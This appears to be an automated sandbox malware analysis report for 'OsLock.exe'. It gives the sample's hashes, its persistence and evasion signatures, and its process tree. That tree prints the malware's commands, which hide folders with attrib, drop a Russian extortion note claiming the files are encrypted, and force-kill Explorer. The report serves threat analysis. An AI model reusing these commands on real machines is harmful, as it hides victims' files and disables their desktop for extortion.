Overview

overview

10

Static

static

3

OsLock.exe

windows7-x64

10

OsLock.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 09:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    OsLock.exe

  • Size

    385KB

  • MD5

    675ea787630f596da0474830ffb49723

  • SHA1

    c8e18cbc3cca1ded47eb5860a71b9f22d46409e1

  • SHA256

    ad861f41bb4a31ee778bf60cecf0a7bdd9c0cc91d5cc17775d15199c214fbccf

  • SHA512

    fa3c2c6edd3435bd16ec652c1738695cd1e8cdbd010b55fd856cefdbebd50552074d06e9b66860fae9c3a2f71ffe1076bb0227944b49286f05e1a3a4c871014d

  • SSDEEP

    6144:Z1IE/9oydPc4IvjTZlyZsDDyr3rAUp48zUCpM69/KImQi/6ebkY:Z1vlc4IrTZlyGDc54

Score
10/10
defense_evasionpersistence

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 13 IoCs
    persistence
  • Drops desktop.ini file(s) 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
    defense_evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Views/modifies file attributes 1 TTPs 12 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\OsLock.exe
    "C:\Users\Admin\AppData\Local\Temp\OsLock.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3172
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4104
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:1128
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:3496
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:944
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:808
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1764
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2072
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:2528
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:3480
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1872
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:3820
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4308
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:3976
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:4548
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4544
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:2532
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:1176
    • C:\Windows\SYSTEM32\taskkill.exe
      taskkill.exe /im Explorer.exe /f
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3440

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\info-0v92.txt
    Filesize

    56B

    MD5

    d1ff8c6f248822be938086bed3d42dee

    SHA1

    0726de2bc7fc3bc36c8b7b8c2a85b937a1defe31

    SHA256

    e0c3bba5f6dacba97a25bf375c90c838c9d95f56ed6aa869f93a11c2424b7690

    SHA512

    8ea5e3ce9e36231cfeddafbbd523ecc602beaaecfe403a66ffd11c19ab880004c98cfabad1c080d1800c96533d50f649c1be4ff1bf3a99f960464cc853921d0b

    Download Submit

  • memory/3172-0-0x00007FF9184C3000-0x00007FF9184C5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3172-1-0x0000000000E40000-0x0000000000EA6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3172-2-0x00007FF9184C0000-0x00007FF918F81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3172-12-0x00007FF9184C3000-0x00007FF9184C5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3172-13-0x00007FF9184C0000-0x00007FF918F81000-memory.dmp

    Filesize

    10.8MB

    Download